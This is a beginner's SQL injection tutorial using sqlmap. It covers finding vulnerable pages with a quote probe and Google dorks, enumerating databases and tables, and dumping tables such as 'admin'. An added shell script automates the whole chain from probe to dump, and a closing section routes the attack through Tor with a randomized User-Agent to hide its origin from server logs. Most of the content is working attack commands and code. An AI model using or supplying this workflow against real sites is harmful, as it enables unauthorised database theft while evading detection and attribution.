- SQLMAP For Dummies v1.0
- By Matrix
- http://www.twitter.com/TheAnonMatrix
- Required for use: Backtrack 5 R1.
- Start your Backtrack 5 R1 (BT5), open a terminal and cd to /pentest/database/sqlmap/, where sqlmap lives.
- Now lets get started!
- First we need a target page. Normally you find one by hand or with Google dorks. To find out if a page is vulnerable to an injection, add a single quote to the parameter:
- http://localhost/index.php?id=1337'
- Notice the ' here: ^
- If the application pastes the value straight into its query, the extra quote breaks the SQL and you get a pretty error (on MySQL something like "You have an error in your SQL syntax"). That is a good start! No error does not prove the page is safe, though: blind injections show nothing on the page, and sqlmap can still find those.
- Lets open sqlmap!
- So the first thing you need to learn is the options, the settings you pass to sqlmap. The base command is:
- python sqlmap.py -u <website>
- With a real page it looks like this:
- python sqlmap.py -u http://localhost/index.php?id=1337
- (note we did not add the ' here: sqlmap injects its own payloads into the id parameter)
- -u stands for URL and tells sqlmap THIS is our target. If the URL has more than one parameter (an & in it), put it in quotes, otherwise the shell treats everything after the & as a separate background command. On its own -u only tests whether the parameter is injectable; we have to add more options for sqlmap to actually pull data:
- (note the following options use double dashes)
- --dbs to list the databases
- --users to list the database users
- python sqlmap.py -u http://localhost/index.php?id=1337 --dbs (and/or) --users
- (for the sake of length we will assume you used --dbs in this tutorial)
- sqlmap first has to confirm that the parameter is injectable. If it is not, it stops there and you get no databases; if it is, the list is printed at the end of the output. If you see databases, congratz!
- Should look like this:
- available databases [2]:
- [*] database1
- [*] database2
- Now to the fun part!
- python sqlmap.py -u http://localhost/index.php?id=1337 --tables -D database1
- This tells sqlmap to list the tables (--tables) in the database (-D) named database1.
- Once you execute this you will find (maybe) tons of tables. Locate the one you want... let's call it admin!
- python sqlmap.py -u http://localhost/index.php?id=1337 --columns -D database1 -T admin
- Now you see the columns of the table admin (-T picks the table, --columns lists its columns; without an enumeration option like --columns sqlmap only re-tests the injection and shows nothing about the table). Next we dump it! This can be done with --dump or --dump-all.
- Examples:
- python sqlmap.py -u http://localhost/index.php?id=1337 --dump-all --exclude-sysdbs
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump
- --dump dumps the contents of the selected table (with only -D and no -T, every table in that database); --dump-all dumps EVERYTHING, and --exclude-sysdbs leaves out the DBMS's own system databases, which are rarely what you are after and take a long time to pull.
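- The steps above are the same command retyped with a longer option list each time. The script below, added here as an example and not part of the original paste, chains them: it runs the single-quote probe from the start of the tutorial, drives sqlmap non-interactively with --batch, and parses the database and table listings so the next stage can loop over them. It assumes sqlmap is at the BT5 path (override with $SQLMAP), that curl is installed for the probe, and that the listings in demo() are constructed from sqlmap's output format so the parsers can be tried offline.

```shell
#!/bin/sh
# Added example (not from the original paste): a small driver for the workflow
# this tutorial walks through by hand, from the single-quote probe to --dump.
# Assumptions: sqlmap is where BT5 puts it unless $SQLMAP overrides it, curl is
# installed for the probe, and the sample listings in demo() are constructed
# from sqlmap's output format for an offline demonstration.
set -eu

SQLMAP="${SQLMAP:-python /pentest/database/sqlmap/sqlmap.py}"

# Step 1 of the tutorial: does appending a ' produce a database error?
# Reads a page body on stdin; succeeds if it contains a typical DB error string.
looks_like_sql_error() {
    grep -qiE 'sql syntax|mysql_fetch|unclosed quotation|ORA-[0-9]{5}|pg_query|syntax error'
}

# Fetch the URL with a trailing ' and check the response for such errors.
quote_probe() {
    url="$1"
    if curl -s --max-time 10 "${url}'" | looks_like_sql_error; then
        echo "error text seen: worth running sqlmap against $url"
    else
        echo "no obvious error text (a blind injection is still possible)"
    fi
}

# Run sqlmap non-interactively; --batch takes the default answer to every
# prompt so the script never blocks waiting for a y/N.
run_sqlmap() {
    url="$1"; shift
    # $SQLMAP is intentionally unquoted: it may be "python /path/sqlmap.py".
    $SQLMAP -u "$url" --batch "$@"
}

# Pull names out of a "[*] name" listing such as the --dbs output:
#   available databases [2]:
#   [*] database1
#   [*] database2
parse_star_list() {
    sed -n 's/^\[\*\] //p'
}

# Pull names out of sqlmap's boxed --tables output:
#   Database: database1
#   [2 tables]
#   +-------+
#   | admin |
#   +-------+
parse_box_list() {
    awk -F'|' '/^\| / { gsub(/^[ \t]+|[ \t]+$/, "", $2); print $2 }'
}

# Stages in the order the tutorial uses them: --dbs, then --tables per database.
enumerate() {
    url="$1"
    for db in $(run_sqlmap "$url" --dbs | parse_star_list); do
        echo "== database: $db"
        run_sqlmap "$url" --tables -D "$db" | parse_box_list | sed 's/^/   table: /'
    done
}

# Last stage: columns first (so you know what you are pulling), then the dump.
dump_table() {
    run_sqlmap "$1" --columns -D "$2" -T "$3"
    run_sqlmap "$1" --dump -D "$2" -T "$3"
}

# Offline demo of the two parsers on constructed sqlmap-style listings.
demo() {
    printf 'available databases [2]:\n[*] database1\n[*] database2\n' | parse_star_list
    printf 'Database: database1\n[2 tables]\n+-------+\n| admin |\n| users |\n+-------+\n' | parse_box_list
}

case "${1:-}" in
    demo)      demo ;;
    probe)     quote_probe "$2" ;;
    enumerate) enumerate "$2" ;;
    dump)      dump_table "$2" "$3" "$4" ;;
esac
```

- Save it as, say, sqlmap-chain.sh and run "sh sqlmap-chain.sh demo" to see the parsers, "probe <url>" for the quote test, "enumerate <url>" for databases and tables, and "dump <url> <db> <table>" for the last step. The table parser only understands the one-column box that --tables prints; --columns and --dump output has more columns and a header row, so read those by eye as the tutorial does.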
- But what about hiding where we come from?
- Tor with SQLMAP:
- First open /etc/apt/sources.list and add this line (lucid is the Ubuntu release BT5 R1 is built on):
- deb http://deb.torproject.org/torproject.org lucid main
- Open the terminal and import the Tor Project's archive signing key with these commands:
- gpg --keyserver keys.gnupg.net --recv 886DDD89
- gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
- Now run these commands as root, one at a time:
- apt-get update
- apt-get install tor tor-geoipdb
- apt-get install polipo
- Start tor: /etc/init.d/tor start
- Then grab a copy of this polipo config file: https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
- Replace /etc/polipo/config with the file above, then restart polipo: /etc/init.d/polipo restart
- Congratz! Now you can run sqlmap through Tor:
- python sqlmap.py -u http://localhost/index.php?id=1337 -D database1 -T admin --dump --tor --random-agent
- Add --check-tor the first time so sqlmap confirms the requests really leave through Tor; if it cannot reach the proxy, point it at polipo with --tor-type=HTTP and --tor-port set to the proxyPort from your polipo config. --random-agent picks a random browser User-Agent so the requests do not announce "sqlmap" in the server logs.
- Happy safe hacking!
- Source:
- http://www.coresec.org/2011/04/24/sqlmap-with-tor/
- https://www.torproject.org/docs/debian.html.en#ubuntu